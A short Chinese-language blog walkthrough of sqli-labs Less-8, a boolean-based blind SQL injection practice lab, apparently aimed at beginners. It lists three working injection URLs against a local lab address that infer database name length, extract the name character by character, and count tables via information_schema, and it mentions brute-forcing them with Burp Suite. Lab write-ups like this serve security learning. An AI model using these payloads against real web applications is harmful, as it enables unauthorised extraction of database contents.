Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
前言
一、GET字符型注入
执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。
二、步骤
和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。
盲注爆库长度payload
http://192.168.135.149/sqli/Less-8/?id=1' and length(database())=8 -- 1
爆库名payload
http://192.168.135.149/sqli/Less-8/?id=1' and ascii(substr((select database()),1,1))=115 -- 1
查表数
http://192.168.135.149/sqli/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema=database())=4 -- 1
总结
熟练应用burpsuite即可完成本题。在此我考虑完成一个整体性的sqli博客,在简单过程直接讲清思路,不过前面基础文章保留,防止萌新不会开始操作,喜欢的朋友不要吝啬你的三连哦!